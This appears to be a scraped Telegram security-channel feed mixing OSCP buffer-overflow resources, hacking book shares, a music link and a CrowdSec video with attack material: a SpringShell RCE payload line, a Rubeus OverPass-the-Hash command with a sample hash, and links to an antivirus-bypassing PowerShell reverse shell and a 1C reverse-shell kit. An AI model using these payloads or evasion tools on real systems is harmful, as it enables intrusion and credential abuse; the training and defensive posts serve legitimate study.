#Bufferoverflow #BOF #OSCP
Buffer Overflow EIP Offset String Generator
This tool is used to find/calculate the offset in an exploit string where your address to overwrite EIP should be. This is the same as the Metasploit, pvefindaddr, and Mona scripts: pattern_create and pattern_offset.
https://projects.jason-rush.com/tools/buffer-overflow-eip-offset-string-generator/
Everything you need to know about buffer overflows for the OSCP in a single note:
https://liodeus.github.io/2020/08/11/bufferOverflow.html
Labs for practice:
https://tryhackme.com/room/bufferoverflowprep
#OSCP #BOF #Bufferoverflow
liodeus.github.io
Buffer Overflow personal cheatsheet
Forwarded from S.E.Reborn
Hacking_APIs_Breaking_Web_Application_Programming_Interfaces_Early.pdf
39.4 MB
📖 Hacking APIs: Breaking Web Application Programming Interfaces.
• Release date: March 5, 2022.
• Rating: ⭐️⭐️⭐️⭐️⭐️ (5 out of 5)
• Price in the online store: $36 or 4464₽.
• VT.
In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:
• Enumerating API users and endpoints using fuzzing techniques;
• Using Postman to discover an excessive data exposure vulnerability;
• Performing a JSON Web Token attack against an API authentication process;
• Combining multiple API attack techniques to perform a NoSQL injection;
• Attacking a GraphQL API to uncover a broken object level authorization vulnerability.
🧩 Software for reading.
#Hack #Web #Eng
I want to share a playlist that has been on repeat for me lately.
Massive Attack + Portishead + Morcheeba = bliss!
https://www.youtube.com/watch?v=_gozzJ5Yjsc
YouTube
Massive Attack • Morcheeba • Portishead - Special Coffeeshop Selection [Seven Beats Music]
Forwarded from white2hack 📚
OWASP_Руководство_по_тестированию_веб_безопасности_by_Кири_Э_.pdf
9.9 MB
OWASP. Web Security Testing Guide, by Eoin Keary, 2020, Russian translation by Condor (Alexander)
A large number of books on various topics, from survival to the secrets of wood carving
Forwarded from APT
PSSW100AVB
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
Forwarded from APT
SpringShell: Spring Core RCE
(CVE-2022-22963)
PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
Research:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
#spring #exploit #rce #cve
Forwarded from APT
OverPass-the-Hash in 1C Enterprise
To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.
Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\1cestart.exe /show"
Bonus:
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
#1c #pth #rubeus #ad
CrowdSec - stealthily redirecting malicious traffic far off into the woods, to honey hives prepared in advance 👺 🐝🐝🐝
#soc #blueteam #defensive
https://youtu.be/2OEDFCo1VXY
YouTube
Ippsecs First Look and Setting up CrowdSec - Stealthfully Forward Malicious Users to Honeypots
00:00 - Intro talking about crowdsec and its multiplayer firewall
01:04 - Showing my setup, 3 web servers, 2 attack servers
02:20 - Installing Crowdsec
03:30 - Going over the command line interface, CSCLI showing decisions
04:10 - Showing decisions -a to…